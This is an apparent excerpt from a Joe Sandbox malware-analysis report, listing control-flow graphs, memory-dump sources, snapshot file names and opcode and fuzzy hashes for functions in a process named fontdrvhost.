                                                                    control_flow_graph 682 7ffd9c10b68f-7ffd9c10b698 683 7ffd9c10b69e-7ffd9c10b6af 682->683 684 7ffd9c10b9cf-7ffd9c10ba10 682->684 685 7ffd9c10b6b1-7ffd9c10b6b5 683->685 686 7ffd9c10b6c5-7ffd9c10b6cc 683->686 698 7ffd9c10ba1b-7ffd9c10bab1 684->698 685->684 688 7ffd9c10b6bb-7ffd9c10b6c3 685->688 689 7ffd9c10b6ce-7ffd9c10b6e4 686->689 690 7ffd9c10b684-7ffd9c10b9c5 686->690 688->686 693 7ffd9c10b774-7ffd9c10b7a4 689->693 694 7ffd9c10b6ea-7ffd9c10b6f2 689->694 690->684 704 7ffd9c10b84e-7ffd9c10b857 693->704 705 7ffd9c10b7aa-7ffd9c10b7ab 693->705 694->684 695 7ffd9c10b6f8-7ffd9c10b70a 694->695 695->684 697 7ffd9c10b710-7ffd9c10b727 695->697 699 7ffd9c10b767-7ffd9c10b76e 697->699 700 7ffd9c10b729-7ffd9c10b730 697->700 709 7ffd9c10ba36-7ffd9c10bab6 698->709 710 7ffd9c10babc-7ffd9c10baff 698->710 699->693 699->694 700->684 703 7ffd9c10b736-7ffd9c10b764 700->703 703->699 707 7ffd9c10b85d-7ffd9c10b863 704->707 708 7ffd9c10b98f-7ffd9c10b99d 704->708 711 7ffd9c10b7ae-7ffd9c10b7c4 705->711 707->684 712 7ffd9c10b869-7ffd9c10b878 707->712 715 7ffd9c10b99f 708->715 716 7ffd9c10b9a4-7ffd9c10b9b5 708->716 709->710 724 7ffd9c10ba58-7ffd9c10bab8 709->724 725 7ffd9c10bb01-7ffd9c10bc07 710->725 711->684 714 7ffd9c10b7ca-7ffd9c10b7ee 711->714 717 7ffd9c10b87e-7ffd9c10b885 712->717 718 7ffd9c10b982-7ffd9c10b989 712->718 720 7ffd9c10b7f0-7ffd9c10b813 call 7ffd9c104318 714->720 721 7ffd9c10b841-7ffd9c10b848 714->721 715->716 717->684 723 7ffd9c10b88b-7ffd9c10b897 call 7ffd9c104318 717->723 718->707 718->708 720->684 733 7ffd9c10b819-7ffd9c10b83f 720->733 721->704 721->711 731 7ffd9c10b89c-7ffd9c10b8a7 723->731 724->710 736 7ffd9c10ba7c-7ffd9c10baba 724->736 761 7ffd9c10bd37-7ffd9c10bd54 725->761 762 7ffd9c10bcec-7ffd9c10c059 725->762 734 7ffd9c10b8e6-7ffd9c10b8f5 731->734 735 7ffd9c10b8a9-7ffd9c10b8c0 731->735 733->720 733->721 734->684 740 7ffd9c10b8fb-7ffd9c10b91f 734->740 735->684 738 7ffd9c10b8c6-7ffd9c10b8e2 735->738 736->710 747 7ffd9c10ba9d-7ffd9c10bab0 736->747 738->735 742 7ffd9c10b8e4 738->742 744 7ffd9c10b922-7ffd9c10b93f 740->744 748 7ffd9c10b962-7ffd9c10b978 742->748 744->684 745 7ffd9c10b945-7ffd9c10b960 744->745 745->744 745->748 748->684 750 7ffd9c10b97a-7ffd9c10b97e 748->750 750->718 764 7ffd9c10c061-7ffd9c10c0c8 761->764 765 7ffd9c10bd5a-7ffd9c10bd69 761->765 762->764 770 7ffd9c10c238 764->770 765->762 766 7ffd9c10bd6b-7ffd9c10bd6f 765->766 766->725 767 7ffd9c10bd75 766->767 769 7ffd9c10bdf3-7ffd9c10be00 767->769 771 7ffd9c10be06-7ffd9c10bf66 769->771 772 7ffd9c10bd77-7ffd9c10bd8f 769->772 770->770 772->769 774 7ffd9c10bd92 call 7ffd9c10ba00 772->774 774->769
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 84d8ec985e674a11bd68afb47af34ddab0afd2a0a11b469b9ae923f9345f6e8e
                                                                    • Instruction ID: 5d77a4f69dbeb158bef534a4df21aefac7b94c445b4872b99f4031802ea71ccd
                                                                    • Opcode Fuzzy Hash: 84d8ec985e674a11bd68afb47af34ddab0afd2a0a11b469b9ae923f9345f6e8e
                                                                    • Instruction Fuzzy Hash: E5C1DE71618A568BEB2DCF58C0E15B137B1FF45350B5446BDC89B8B6CBCA38E881CB84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C1086FA Relevance: .3, Instructions: 313COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 785 7ffd9c1086fa-7ffd9c1088fb 791 7ffd9c108906-7ffd9c108998 785->791 806 7ffd9c108940-7ffd9c108969 791->806 807 7ffd9c10896a-7ffd9c108979 call 7ffd9c10899a 791->807 806->807
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7df43dad0ab797f749c7e8f762441aa9d68dfce0fcf77ca2e6bdabb8ddd879e8
                                                                    • Instruction ID: fb08a515945832dc7b61c2f97f5158c6fdb316f58f247e9fce4c0957fe826825
                                                                    • Opcode Fuzzy Hash: 7df43dad0ab797f749c7e8f762441aa9d68dfce0fcf77ca2e6bdabb8ddd879e8
                                                                    • Instruction Fuzzy Hash: 0D318D22B1ED5BCFFB74EA9884615B877B0EF99394F1400BBD45EE61C2CE6828408746
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10E03F Relevance: .3, Instructions: 299COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b63ffce69231721f1bc8c023ae9ace54610b8e43ac677f76be8e39899771e831
                                                                    • Instruction ID: 99e08a8d2f24e132b41fb6f26e6b2c210c61467a073dfc9717eda36a969abb1c
                                                                    • Opcode Fuzzy Hash: b63ffce69231721f1bc8c023ae9ace54610b8e43ac677f76be8e39899771e831
                                                                    • Instruction Fuzzy Hash: F6411623F0C61781F735BBD970B18F857A09F043D4F1545BAE88E9A1C7CD1B78544289
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10E0D4 Relevance: .3, Instructions: 276COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c47954bdbc62658f63ce42bd2d8aff775458514fb4300267d73a4b77493be71a
                                                                    • Instruction ID: 5b389c9601bc3ca3de3c40285cf37580fc804a63a4d4202428050ab59b749791
                                                                    • Opcode Fuzzy Hash: c47954bdbc62658f63ce42bd2d8aff775458514fb4300267d73a4b77493be71a
                                                                    • Instruction Fuzzy Hash: 3A11C413F0D2978AF738D6EA18310BD5A706F413D0F1841BED4DE6A1D6DC0C6804638A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10A466 Relevance: .3, Instructions: 258COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7f1da4454d23c98428ee01ee494c1d0be6aab3168ada31ee56a6b1337a4bb912
                                                                    • Instruction ID: 4c661c31564bfe13d21b0d9f4593fccb4e17236ed8663cfac6a43df290aca28f
                                                                    • Opcode Fuzzy Hash: 7f1da4454d23c98428ee01ee494c1d0be6aab3168ada31ee56a6b1337a4bb912
                                                                    • Instruction Fuzzy Hash: 9B812332B0CA078FE338DBA894655B977F0FF55390B14057EE48ED3192DE28BA428749
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C108389 Relevance: .2, Instructions: 246COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 080b647a80b2c652186820760e81c2efbf40b4c56a022dcb4576a1db23ec4bad
                                                                    • Instruction ID: 5b2c80f4c8e1ed4ce73a583a7bf8b797cc5a6faccd623f8897b67f12775679fb
                                                                    • Opcode Fuzzy Hash: 080b647a80b2c652186820760e81c2efbf40b4c56a022dcb4576a1db23ec4bad
                                                                    • Instruction Fuzzy Hash: 00713C32A0E54B8FF778DA58C4666B537E0FF44350B1402BBD09ED75A2DE28A8168789
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10D985 Relevance: .2, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6cdf112992a50265862359349e86551eda5e44decf2f1ea9f110265a48813506
                                                                    • Instruction ID: 5d356757969d9ca7bd51c1ed97f285c817f33c949d1816f2c55a5a08420ee81a
                                                                    • Opcode Fuzzy Hash: 6cdf112992a50265862359349e86551eda5e44decf2f1ea9f110265a48813506
                                                                    • Instruction Fuzzy Hash: 2D71E523F0EA9B8FEB21FB9C98B24E97BB0EF05394B0401B6D059DA1D3DD1968068745
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10C6B1 Relevance: .2, Instructions: 221COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ebb70ae7bd2d01da6243aa323ca1e9358a039723689203487a8b166c225eccca
                                                                    • Instruction ID: 521cac0f1dbfa31408afbc2164a78d285a9d80c373c86bd37a43650b9867b645
                                                                    • Opcode Fuzzy Hash: ebb70ae7bd2d01da6243aa323ca1e9358a039723689203487a8b166c225eccca
                                                                    • Instruction Fuzzy Hash: CB81AD31A09B078FE379DB64D1B457577B1FF54340B10497EC48A97A92CB29B882CF4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10BA00 Relevance: .2, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f6b0297f55aafab5f3fba2c104d94baa91e4140c41db08e578f1156527f6429b
                                                                    • Instruction ID: 0ce8820d25005ea31da2a2e544cef7c7bf79249406172ed1c5e65b27fe2abf64
                                                                    • Opcode Fuzzy Hash: f6b0297f55aafab5f3fba2c104d94baa91e4140c41db08e578f1156527f6429b
                                                                    • Instruction Fuzzy Hash: A081A031E1864A8FDBA9EB688865BE9B7B1EF15300F0041FED45DE32D6DE346980CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10B07E Relevance: .2, Instructions: 208COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bb76682308b1333a3554d98fff90cf3c9dcb58e1809cebb46405344392a1dd11
                                                                    • Instruction ID: 9e7af658c5106bf3ffca77fc4011a71f5c2285df932dca05cdb4a8adb1a777e2
                                                                    • Opcode Fuzzy Hash: bb76682308b1333a3554d98fff90cf3c9dcb58e1809cebb46405344392a1dd11
                                                                    • Instruction Fuzzy Hash: 78711331A0DA8B8FD759DB68D0A06A4BBB0FF16340F5441B9C44AC7AC7DB38B890C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10769B Relevance: .2, Instructions: 198COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9f4010bb8d7431fb1b388f04562df4fc526b24c224b847198a14d4b38bb4f930
                                                                    • Instruction ID: ba6fc04664a3996a81b3bbf4f9985a535cf55ad62efb6bdf82535c9c26447092
                                                                    • Opcode Fuzzy Hash: 9f4010bb8d7431fb1b388f04562df4fc526b24c224b847198a14d4b38bb4f930
                                                                    • Instruction Fuzzy Hash: 8E51A132E1D54B8FEB65DBA488746BD7BB1FF59380F1405BAD00EE2182EE286841C785
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10E91B Relevance: .2, Instructions: 196COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfdefaf38ce7edd4bf1383b589ba338f30c060117f41147825af5c3f4e9a7f5f
                                                                    • Instruction ID: a0a145806a97894cddf063a1ab960741765db8e8b2a63909b631dab87b14e50d
                                                                    • Opcode Fuzzy Hash: cfdefaf38ce7edd4bf1383b589ba338f30c060117f41147825af5c3f4e9a7f5f
                                                                    • Instruction Fuzzy Hash: 3651C532F1D94B8EEBA5DBA588656BC7BB0FF49380F1404BAD04EE71D6DE3868418705
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA208D0 Relevance: .2, Instructions: 179COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 120f94ae00b363b3173be8ad676ff2e56c887f9a40ce00750e52c4efb57b4606
                                                                    • Instruction ID: 97a35d4f007ccf54db380795dc1e6e37bc087a386074bdfde4e4a0c56ccab969
                                                                    • Opcode Fuzzy Hash: 120f94ae00b363b3173be8ad676ff2e56c887f9a40ce00750e52c4efb57b4606
                                                                    • Instruction Fuzzy Hash: D651C231B0855E8FDB45FFA8D4A5AEC77A1FF58314F0401BAD40AD71AACE35A881C785
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA21715 Relevance: .1, Instructions: 139COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4bc3c613cdd51337efa928444db5e36507974e5ee95307864429335f7f58959c
                                                                    • Instruction ID: 2158dacfa776107afc38f6bb1bb75ac8e1988a6bfd7042a4f4fda9d47ddc7c7d
                                                                    • Opcode Fuzzy Hash: 4bc3c613cdd51337efa928444db5e36507974e5ee95307864429335f7f58959c
                                                                    • Instruction Fuzzy Hash: F051D431E0A69E8FEB60EB68C8586E9B3E0FF65310F0540B6D44DC71A1DE746A84CF01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA20908 Relevance: .1, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 30f1ca52208a3b3b6a87490e28aaf1ca8b57730e1d15a4fb627a13cec141abea
                                                                    • Instruction ID: 1b8fb49a8b9fd336a4d60be61d19768da0872ee241d524e30c393a9dc724b61a
                                                                    • Opcode Fuzzy Hash: 30f1ca52208a3b3b6a87490e28aaf1ca8b57730e1d15a4fb627a13cec141abea
                                                                    • Instruction Fuzzy Hash: EE517C70A0590E9FCF84EF98D494EEDBBF1FF68325B050169E419E7260DA74E990CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10D0D8 Relevance: .1, Instructions: 131COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b1c776a0964c730583b38db162f4bb67b6a01a0f6551131f45f2dc98081202b7
                                                                    • Instruction ID: ad0f3a34efa7416e64470dcf8d2259ae8a1a30d9fe9da76b16fb99eb463d497e
                                                                    • Opcode Fuzzy Hash: b1c776a0964c730583b38db162f4bb67b6a01a0f6551131f45f2dc98081202b7
                                                                    • Instruction Fuzzy Hash: 2741E421A1C55B4EEBBC9658C4B06F4B7B1FF95340F3441BAD05ED7186CD3C69818749
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C100CD7 Relevance: .1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c66e81d03a13b729e3d82aa17e519c75be4594a69649dc72cf5851b966e6ca04
                                                                    • Instruction ID: 263482205da07e25065d8121f975ecf17d7625c51c49a1c48cec65843d13c50e
                                                                    • Opcode Fuzzy Hash: c66e81d03a13b729e3d82aa17e519c75be4594a69649dc72cf5851b966e6ca04
                                                                    • Instruction Fuzzy Hash: 0641533260CA098FDFA8EF58C4A59A5B3E1FB69310B0402A9D45EC31A6DE35FC45CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10CC67 Relevance: .1, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6d0e6d32f313fc4651ce0558890ddea8434f88901a74a81cf912db3c3ad1ff7
                                                                    • Instruction ID: abde9b797f017e8ebc93f10f99ba1f8acaf2063cf1bce60f47a1cbc2983c1ae2
                                                                    • Opcode Fuzzy Hash: e6d0e6d32f313fc4651ce0558890ddea8434f88901a74a81cf912db3c3ad1ff7
                                                                    • Instruction Fuzzy Hash: 1541803260C9098FDFA8EF58C4A5DB4B7F1FB69320B14416AD45AC3292DE31E985CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA21613 Relevance: .1, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e3cb7adb77aed50c342e48001783bbf761700c9e561c19db712e1d66bbab3da6
                                                                    • Instruction ID: 0ea932dd702f5712fb29582924dbca9f1f8e367bbb1d2ace5688f097ac955cf0
                                                                    • Opcode Fuzzy Hash: e3cb7adb77aed50c342e48001783bbf761700c9e561c19db712e1d66bbab3da6
                                                                    • Instruction Fuzzy Hash: A1315F23F0E65A0FE721BBBDE8B65ED3B90EF51375F0901B3D0D9860A3ED2915098252
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10CD11 Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a932e210ea02952cc7c64b63660c3d141d20efef3094ca048dbc9c45cc290109
                                                                    • Instruction ID: e1134dedfad6d64148b9efb28153d067dc00b0a242214ecc4bbad1180e61a043
                                                                    • Opcode Fuzzy Hash: a932e210ea02952cc7c64b63660c3d141d20efef3094ca048dbc9c45cc290109
                                                                    • Instruction Fuzzy Hash: D831923260C9498FDFACEF58C4A5DB4B7E1FB6931071441AAD45AC7192CE35EC85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C100D81 Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c77bd8739d68ef62df9145f108e0a30178af0ef35428cec8fef29e6e9148de8
                                                                    • Instruction ID: cf61464fc938ffb625b3a31f32f4262a43a77b613fddc46b2275aa3e6955de2c
                                                                    • Opcode Fuzzy Hash: 0c77bd8739d68ef62df9145f108e0a30178af0ef35428cec8fef29e6e9148de8
                                                                    • Instruction Fuzzy Hash: C231623260CA498FDB6CEF18C4A5DA4B3E1FB69310B0502A9D45AC71A6CE35EC85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C108DF2 Relevance: .1, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aaf464714d23ba57345522e7c6f88488ce623f0d83b58aa52f689d9ae2373229
                                                                    • Instruction ID: b1049924246f882dac8b6fe7c097e1ba44dc539cb282d183ee4e919176ecf06d
                                                                    • Opcode Fuzzy Hash: aaf464714d23ba57345522e7c6f88488ce623f0d83b58aa52f689d9ae2373229
                                                                    • Instruction Fuzzy Hash: F141BF32F1D91B8FEB64EB98C8A19FC77B1FF54350F500076D04AAB196DE2568418784
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10CCAB Relevance: .1, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3741c30a7218f2e68c472a208969f7b6721be8967a6001cc48cb2ea6607be0ee
                                                                    • Instruction ID: 2237b0d867bfa3addcaa269f3844fd8835f3608bb7e493a5efa6b469fd27c9c7
                                                                    • Opcode Fuzzy Hash: 3741c30a7218f2e68c472a208969f7b6721be8967a6001cc48cb2ea6607be0ee
                                                                    • Instruction Fuzzy Hash: E7317E3260C9098FDFA8EF58C4A5DB4B7F1FB6931071441AAD45AC7292CE35E985CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C100D1B Relevance: .1, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5c2a38bbd80eefaf4afbc9e726feabcbec2117eb976e5035ad575ec8098be5cc
                                                                    • Instruction ID: d3b63270e02e93623c8339a1115ba8cfb739764afcbb0b6c6ba81dc6b9d5c09a
                                                                    • Opcode Fuzzy Hash: 5c2a38bbd80eefaf4afbc9e726feabcbec2117eb976e5035ad575ec8098be5cc
                                                                    • Instruction Fuzzy Hash: B831323260CA498FDF68EF18C4A59A4B3E1FB69310B0502A9D45EC71A6DE35FC85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA20998 Relevance: .1, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d789c99e5895a939d2dc3848ee9ce25deb235c8d6e8f9c96b02a1d413f815a54
